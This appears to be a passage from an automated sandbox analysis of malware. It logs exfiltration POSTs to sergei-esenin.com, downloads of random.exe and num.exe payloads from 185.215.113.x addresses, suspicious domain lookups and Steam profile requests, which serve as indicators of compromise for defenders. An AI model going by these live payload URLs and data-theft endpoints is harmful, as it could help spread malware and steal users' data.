Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=LAlU2jiP0ih1GCQ2tR8pCO9umtnkgr__mMhgdSGI1E8-1729256669-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1290Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=LAlU2jiP0ih1GCQ2tR8pCO9umtnkgr__mMhgdSGI1E8-1729256669-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 567125Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=oVu0E9qEE3l6igEmGLJahzIyOc76s9q8jI5.nj__y8Q-1729256686-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=oVu0E9qEE3l6igEmGLJahzIyOc76s9q8jI5.nj__y8Q-1729256686-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18168Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=oVu0E9qEE3l6igEmGLJahzIyOc76s9q8jI5.nj__y8Q-1729256686-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8789Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=LAlU2jiP0ih1GCQ2tR8pCO9umtnkgr__mMhgdSGI1E8-1729256669-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=oVu0E9qEE3l6igEmGLJahzIyOc76s9q8jI5.nj__y8Q-1729256686-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20442Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=oVu0E9qEE3l6igEmGLJahzIyOc76s9q8jI5.nj__y8Q-1729256686-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1279Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=oVu0E9qEE3l6igEmGLJahzIyOc76s9q8jI5.nj__y8Q-1729256686-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 561980Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=oVu0E9qEE3l6igEmGLJahzIyOc76s9q8jI5.nj__y8Q-1729256686-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A5BE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 6_2_00A5BE30
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.103If-Modified-Since: Fri, 18 Oct 2024 12:50:16 GMTIf-None-Match: "1cb800-624bfbeaba684"
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.103If-Modified-Since: Fri, 18 Oct 2024 12:50:09 GMTIf-None-Match: "2d8200-624bfbe479d49"
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.103
Source: ea2c7beae0.exe, 00000007.00000002.2464806930.0000000001083000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: //www.gstatic.com/recaptcha/ https://www.youtube.com/ ht equals www.youtube.com (Youtube)
Source: skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: ea2c7beae0.exe, 00000007.00000003.2443701449.0000000001084000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd883ccb3237fa39d2837163d0f38217b; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=b06620d34975df90cb4ac790; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type34508Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveFri, 18 Oct 2024 13:04:14 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd883ccb3237fa39d2837163d0f38217b; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=e22be341ffae5048276ae28b; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type25258Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveFri, 18 Oct 2024 13:04:37 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: ea2c7beae0.exe, 00000007.00000002.2464806930.0000000001083000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s://www.youtube.B equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: clearancek.site
Source: global traffic DNS traffic detected: DNS query: mobbipenju.store
Source: global traffic DNS traffic detected: DNS query: eaglepawnoy.store
Source: global traffic DNS traffic detected: DNS query: dissapoiznw.store
Source: global traffic DNS traffic detected: DNS query: studennotediw.store
Source: global traffic DNS traffic detected: DNS query: bathdoomgaz.store
Source: global traffic DNS traffic detected: DNS query: spirittunek.store
Source: global traffic DNS traffic detected: DNS query: licendfilteo.site
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: sergei-esenin.com
Source: unknown HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: sergei-esenin.com
Source: global traffic HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Date: Fri, 18 Oct 2024 13:04:15 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Frame-Options: SAMEORIGIN
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bEtFHJAqb1J3Ot98KL%2Fqoqp4JoFHK5uNhw7vjnCOZ%2Fc6ZWqAfDxVFQAOGi2LaAFVoGExOFm%2FibYw9s8PlhiSk1m2IrMgq%2F4QSt2oSw634D9X7v3Hhnvex%2FmAgVxbkRf91XbOjg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d48bbb1fd266b77-DFW
Source: global traffic HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Date: Fri, 18 Oct 2024 13:04:29 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Frame-Options: SAMEORIGIN
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e5lBCMPs%2Flow7FW5CY7FT9uN0ldwZWIIb8ht%2FunKx2EKGy2UqXWBVzUwQdaMfElMdVGNfvgc6hA3qJrY89B6N8gIPL%2BsD9wIfpjmgJ0qFarrTc5yxPdfqtetOqJ740khjRn5Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d48bc06afd82fd0-DFW
Source: global traffic HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Date: Fri, 18 Oct 2024 13:04:46 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Frame-Options: SAMEORIGIN
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oNSBwyj3862PKaCNDvzaVv5wdgeVM4qISTqaodKW9ZEfMIg26%2Fp7tFAnJmKxE%2F1fhak18WhGjnw9nVmZ7%2BNgBQNehUrbKJKOwXwubiSmdXCSu1zcnb%2FbTBtAefmDDU4ZJnP4Lw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d48bc759d296b0d-DFW
Source: skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: ea2c7beae0.exe, 00000010.00000002.2932095339.0000000005350000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000002.2920844203.0000000000853000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/
Source: skotes.exe, 00000006.00000002.2921573681.000000000144E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/luma/random.exe
Source: skotes.exe, 00000006.00000002.2921573681.000000000144E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/luma/random.exe1395
Source: skotes.exe, 00000006.00000002.2921573681.000000000144E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/luma/random.exeY
Source: skotes.exe, 00000006.00000002.2921573681.000000000144E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/luma/random.exep2
Source: skotes.exe, 00000006.00000002.2921573681.000000000144E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/luma/random.exes
Source: ea2c7beae0.exe, 0000000B.00000003.2864940536.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000002.2920844203.0000000000853000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/mine/random.exe
Source: ea2c7beae0.exe, 00000010.00000002.2920844203.0000000000853000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/mine/random.exeP
Source: skotes.exe, 00000006.00000002.2921573681.0000000001479000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/off/random.exe
Source: skotes.exe, 00000006.00000002.2921573681.0000000001479000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2866675678.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2864940536.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2866246791.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000002.2919863056.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000002.2920844203.0000000000853000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/steam/random.exe
Source: ea2c7beae0.exe, 0000000B.00000003.2866675678.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2866246791.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/steam/random.exe#
Source: ea2c7beae0.exe, 00000010.00000002.2919623913.00000000003EA000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/steam/random.exe0
Source: skotes.exe, 00000006.00000002.2921573681.0000000001479000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/steam/random.exeH=V
Source: ea2c7beae0.exe, 0000000B.00000003.2864940536.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/steam/random.exeI
Source: skotes.exe, 00000006.00000002.2921573681.0000000001479000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/steam/random.exeV;
Source: ea2c7beae0.exe, 00000010.00000002.2919863056.00000000007DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/steam/random.exel%
Source: ea2c7beae0.exe, 0000000B.00000003.2864940536.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000002.2920844203.0000000000853000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/well/random.exe
Source: ea2c7beae0.exe, 00000010.00000002.2920844203.0000000000853000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/well/random.exev
Source: ea2c7beae0.exe, 00000010.00000002.2919863056.00000000007A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103:80/steam/random.exe
Source: skotes.exe, 00000006.00000002.2921573681.0000000001479000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/test/num.exe
Source: 6a8d4317d4.exe, 00000008.00000002.2537460651.000000000095E000.00000004.00000020.00020000.00000000.sdmp, 6a8d4317d4.exe, 0000000E.00000002.2695281635.000000000094B000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000000F.00000002.2731328670.00000000011EE000.00000004.00000020.00020000.00000000.sdmp, 6a8d4317d4.exe, 00000011.00000002.2867421028.000000000162B000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000013.00000002.2904376187.0000000000C47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37
